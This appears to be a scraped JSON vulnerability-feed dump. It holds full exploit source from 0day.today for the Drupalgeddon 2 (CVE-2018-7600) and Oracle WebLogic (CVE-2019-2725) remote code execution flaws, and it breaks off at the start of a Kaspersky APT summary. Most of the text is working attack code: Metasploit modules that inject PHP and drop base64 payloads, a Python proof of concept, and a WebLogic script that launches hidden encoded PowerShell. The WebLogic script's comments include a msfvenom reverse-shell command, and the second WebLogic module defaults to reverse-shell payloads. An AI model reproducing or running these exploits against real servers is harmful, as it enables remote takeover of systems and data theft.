name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n \r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30199", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T23:26:54", "description": "This Metasploit module 
exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "zdt", "title": "Drupal Drupalgeddon 2 Forms API Property Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30268", "href": "https://0day.today/exploit/description/30268", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # XXX: CmdStager can't handle badchars\r\n include Msf::Exploit::PhpEXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\r\n 'Description' => %q{\r\n This module exploits a Drupal property injection in the Forms API.\r\n\r\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\r\n },\r\n 'Author' => [\r\n 'Jasper Mattsson', # Vulnerability discovery\r\n 'a2u', # Proof of concept (Drupal 8.x)\r\n 'Nixawk', # Proof of concept (Drupal 8.x)\r\n 'FireFart', # Proof of concept (Drupal 7.x)\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-7600'],\r\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\r\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\r\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\r\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\r\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\r\n ['URL', 'https://github.com/FireFart/CVE-2018-7600'],\r\n ['AKA', 'SA-CORE-2018-002'],\r\n ['AKA', 'Drupalgeddon 2']\r\n ],\r\n 'DisclosureDate' => 'Mar 28 2018',\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'linux'],\r\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Payload' => {'BadChars' => '&>\\''},\r\n # XXX: Using \"x\" in Gem::Version::new isn't technically appropriate\r\n 'Targets' => [\r\n #\r\n # Automatic targets (PHP, cmd/unix, native)\r\n #\r\n ['Automatic (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_memory\r\n ],\r\n ['Automatic (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_dropper\r\n ],\r\n ['Automatic (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory\r\n ],\r\n ['Automatic (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 7.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 7.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 7.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 7.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 7.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 8.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 8.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 8.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 8.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => 
ARCH_CMD,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 8.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :linux_dropper\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\r\n 'DefaultOptions' => {'WfsDelay' => 2}\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),\r\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\r\n OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n checkcode = CheckCode::Safe\r\n\r\n if drupal_version\r\n print_status(\"Drupal #{@version} targeted at #{full_uri}\")\r\n checkcode = CheckCode::Detected\r\n else\r\n print_error('Could not determine Drupal version to target')\r\n return CheckCode::Unknown\r\n end\r\n\r\n if drupal_unpatched?\r\n print_good('Drupal appears unpatched in CHANGELOG.txt')\r\n checkcode = CheckCode::Appears\r\n end\r\n\r\n token = random_crap\r\n res = execute_command(token, func: 'printf')\r\n\r\n if res && res.body.start_with?(token)\r\n checkcode = CheckCode::Vulnerable\r\n end\r\n\r\n checkcode\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\r\n # XXX: Naughty datastore modification\r\n datastore['DUMP_OUTPUT'] = true\r\n end\r\n\r\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\r\n case target['Type']\r\n when :php_memory\r\n execute_command(payload.encoded, func: 'assert')\r\n\r\n 
sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # XXX: This will spawn a *very* obvious process\r\n execute_command(\"php -r '#{payload.encoded}'\")\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :php_dropper, :linux_dropper\r\n dropper_assert\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n dropper_exec\r\n end\r\n end\r\n\r\n def dropper_assert\r\n php_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{random_crap}.php\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # Stage 1 decodes the PHP and writes it to disk\r\n stage1 = %Q{\r\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\r\n }\r\n\r\n # Stage 2 executes said PHP in-process\r\n stage2 = %Q{\r\n include_once(\"#{php_file}\");\r\n }\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Hopefully pop our shell with assert()\r\n execute_command(stage1.strip, func: 'assert')\r\n execute_command(stage2.strip, func: 'assert')\r\n end\r\n\r\n def dropper_exec\r\n php_file = \"#{random_crap}.php\"\r\n tmp_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{php_file}\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Write the payload or dropper to disk (!)\r\n # NOTE: Analysis indicates > is a badchar for 8.x\r\n execute_command(\"echo #{dropper} | base64 -d | tee 
#{php_file}\")\r\n\r\n # Attempt in-process execution of our PHP script\r\n send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, php_file)\r\n )\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # Try to get a shell with PHP CLI\r\n execute_command(\"php #{php_file}\")\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n register_file_for_cleanup(tmp_file)\r\n\r\n # Fall back on our temp file\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\r\n execute_command(\"php #{tmp_file}\")\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\r\n\r\n vprint_status(\"Executing with #{func}(): #{cmd}\")\r\n\r\n res =\r\n case @version.to_s\r\n when '7.x'\r\n exploit_drupal7(func, cmd)\r\n when '8.x'\r\n exploit_drupal8(func, cmd)\r\n end\r\n\r\n if res && res.code != 200\r\n print_error(\"Unexpected reply: #{res.inspect}\")\r\n return\r\n end\r\n\r\n if res && datastore['DUMP_OUTPUT']\r\n print_line(res.body)\r\n end\r\n\r\n res\r\n end\r\n\r\n def drupal_version\r\n if target['Version']\r\n @version = target['Version']\r\n return @version\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n # Check for an X-Generator header\r\n @version =\r\n case res.headers['X-Generator']\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n\r\n return @version if @version\r\n\r\n # Check for a <meta> tag\r\n generator = res.get_html_document.at(\r\n '//meta[@name = \"Generator\"]/@content'\r\n )\r\n\r\n return unless generator\r\n\r\n @version =\r\n case generator.value\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n end\r\n\r\n def drupal_unpatched?\r\n unpatched = true\r\n\r\n # Check for patch level in CHANGELOG.txt\r\n uri =\r\n case 
@version.to_s\r\n when '7.x'\r\n normalize_uri(target_uri.path, 'CHANGELOG.txt')\r\n when '8.x'\r\n normalize_uri(target_uri.path, 'core/CHANGELOG.txt')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n if res.body.include?('SA-CORE-2018-002')\r\n unpatched = false\r\n end\r\n\r\n unpatched\r\n end\r\n\r\n def exploit_drupal7(func, code)\r\n vars_get = {\r\n 'q' => 'user/password',\r\n 'name[#post_render][]' => func,\r\n 'name[#markup]' => code,\r\n 'name[#type]' => 'markup'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_pass',\r\n '_triggering_element_name' => 'name'\r\n }\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n\r\n return res unless res && res.code == 200\r\n\r\n form_build_id = res.get_html_document.at(\r\n '//input[@name = \"form_build_id\"]/@value'\r\n )\r\n\r\n return res unless form_build_id\r\n\r\n vars_get = {\r\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\r\n }\r\n\r\n vars_post = {\r\n 'form_build_id' => form_build_id.value\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def exploit_drupal8(func, code)\r\n # Clean URLs are enabled by default and \"can't\" be disabled\r\n uri = normalize_uri(target_uri.path, 'user/register')\r\n\r\n vars_get = {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => 1,\r\n '_wrapper_format' => 'drupal_ajax'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_register_form',\r\n '_drupal_ajax' => 1,\r\n 'mail[#type]' => 'markup',\r\n 'mail[#post_render][]' => func,\r\n 'mail[#markup]' => code\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def random_crap\r\n 
Rex::Text.rand_text_alphanumeric(8..42)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-26] #", "sourceHref": "https://0day.today/exploit/30268", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-20T19:55:56", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-18T00:00:00", "type": "zdt", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-18T00:00:00", "id": "1337DAY-ID-30200", "href": "https://0day.today/exploit/description/30200", "sourceData": "#!/usr/bin/env\r\nimport sys\r\nimport requests\r\n \r\nprint ('################################################################')\r\nprint ('# Proof-Of-Concept for CVE-2018-7600')\r\nprint ('# by Vitalii Rudnykh')\r\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\r\nprint ('# https://github.com/a2u/CVE-2018-7600')\r\nprint ('################################################################')\r\nprint ('Provided only for educational or information purposes\\n')\r\n \r\ntarget = input('Enter target url (example: https://domain.ltd/): ')\r\n \r\n# Add proxy support (eg. 
BURP to analyze HTTP(s) traffic)\r\n# set verify = False if your proxy certificate is self signed\r\n# remember to set proxies both for http and https\r\n# \r\n# example:\r\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n# verify = False\r\nproxies = {}\r\nverify = True\r\n \r\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\r\npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\r\n \r\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\r\ncheck = requests.get(target + 'hello.txt')\r\nif check.status_code != 200:\r\n sys.exit(\"Not exploitable\")\r\nprint ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-20] #", "sourceHref": "https://0day.today/exploit/30200", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-01T19:54:17", "description": "Exploit for windows platform in category web applications", "cvss3": {}, "published": "2019-05-01T00:00:00", "type": "zdt", "title": "Oracle #Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution Exploit #RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T00:00:00", "id": "1337DAY-ID-32626", "href": "https://0day.today/exploit/description/32626", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725\r\n# Date: 30/04/2019\r\n# Exploit Author: Avinash Kumar Thapa\r\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\r\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\r\n# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0\r\n# Tested on:\r\n\t#OS: Windows 2012 R2 (Build 9600).\r\n\t#Architecture : x64\r\n\t#System Language : en_US\r\n\r\n\r\n# CVE : CVE-2019-2725\r\n\r\n\r\n# Script Usage:\r\n# python 
exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps\r\n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1\r\n# Add the powershell command in the variable\r\n\r\n__author__ = \"Avinash Kumar Thapa\"\r\n__description__ = \"\"\"\r\nVulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server\r\n\r\nCREDIT STATEMENT:\r\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:\r\n\r\nBadcode of Knownsec 404 Team: CVE-2019-2725\r\nHongwei Pan of Minsheng Banking Corp.: CVE-2019-2725\r\nLiao Xinxi of NSFOCUS Security Team: CVE-2019-2725\r\nLin Zheng of Minsheng Banking Corp.: CVE-2019-2725\r\nSong Keya of Minsheng Banking Corp.: CVE-2019-2725\r\nTianlei Li of Minsheng Banking Corp.: CVE-2019-2725\r\nZengShuai Hao: CVE-2019-2725\r\nZhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725\r\n\r\n\"\"\"\r\n\r\nimport requests\r\nimport sys\r\n\r\nprint \"Exploit Written by Avinash Kumar Thapa\"\r\n\r\n\r\nexploit = \"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e 
LgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==\"\r\n\r\nurl = sys.argv[1]\r\n\r\nrequest_headers = {\"Accept-Encoding\": \"gzip, deflate\", \"Accept\": \"*/*\", \"Accept-Language\": \"en\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\", \"Connection\": \"close\", \"Content-Type\": \"text/xml\"}\r\ndata=\"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:wsa=\\\"http://www.w3.org/2005/08/addressing\\\" xmlns:asy=\\\"http://www.bea.com/async/AsyncResponseService\\\">\\r\\n <soapenv:Header>\\r\\n <wsa:Action>xx</wsa:Action>\\r\\n <wsa:RelatesTo>xx</wsa:RelatesTo>\\r\\n <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\">\\r\\n <void class=\\\"java.lang.ProcessBuilder\\\">\\r\\n <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\\r\\n <void index=\\\"0\\\">\\r\\n <string>cmd</string>\\r\\n </void>\\r\\n <void index=\\\"1\\\">\\r\\n <string>/c</string>\\r\\n </void>\\r\\n <void index=\\\"2\\\">\\r\\n <string>%s</string>\\r\\n </void>\\r\\n </array>\\r\\n <void method=\\\"start\\\"/></void>\\r\\n </work:WorkContext>\\r\\n </soapenv:Header>\\r\\n <soapenv:Body>\\r\\n <asy:onAsyncDelivery/>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope>\" % (exploit)\r\nresponse = requests.post(url, headers=request_headers, data=data)\r\nprint \"status_code:%s\" % str(response.status_code)\r\nprint(response)\n\n# 0day.today [2019-05-01] #", "sourceHref": "https://0day.today/exploit/32626", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2022-06-22T19:33:15", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-07T00:00:00", "type": "zdt", "title": "Oracle Weblogic Server Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-07T00:00:00", "id": "1337DAY-ID-32663", "href": "https://0day.today/exploit/description/32663", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' =>\n [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # 
Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-2725'],\n ['CNVD-C', '2019-48814'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']\n ],\n 'Privileged' => false,\n 'Platform' => %w{ unix win solaris },\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\n ],\n [ 'Solaris',\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => 'Apr 23 2019'))\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),\n OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(datastore['WSPATH']),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => {'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?(\"<faultcode>env:Client</faultcode>\")\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status(\"The target returned a non-vulnerable HTTP code\")\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status(\"The target did not respond in an expected way\")\n 
Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status(\"Generating payload...\")\n case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })\n when 'Unix','Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %Q|<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"|\n soap_payload << %Q|xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"|\n soap_payload << %Q|xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">|\n soap_payload << %Q|<soapenv:Header>|\n soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|\n soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|\n soap_payload << %Q|<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">|\n soap_payload << %Q|<void class=\"java.lang.ProcessBuilder\">|\n soap_payload << %Q|<array class=\"java.lang.String\" length=\"3\">|\n soap_payload << %Q|<void index=\"0\">|\n soap_payload << %Q|<string>#{string0_cmd}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"1\">|\n soap_payload << %Q|<string>#{string1_param}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"2\">|\n soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|\n #soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</array>|\n soap_payload << %Q|<void method=\"start\"/>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</work:WorkContext>|\n soap_payload << 
%Q|</soapenv:Header>|\n soap_payload << %Q|<soapenv:Body>|\n soap_payload << %Q|<asy:onAsyncDelivery/>|\n soap_payload << %Q|</soapenv:Body>|\n soap_payload << %Q|</soapenv:Envelope>|\n\n uri = normalize_uri(datastore['WSPATH'])\n if uri.nil?\n datastore['URIPATH'] = \"http://#{RHOST}:#{RPORT}/\"\n end\n\n print_status(\"Sending payload...\")\n\n begin\n res = send_request_cgi(\n 'uri' => uri,\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => {'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, \"The target forcibly closed the connection, and is likely not vulnerable.\")\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, \"No response from host\")\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply,\"Exploit failed. Host responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/32663", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2019-10-16T11:39:54", "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. 
They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively 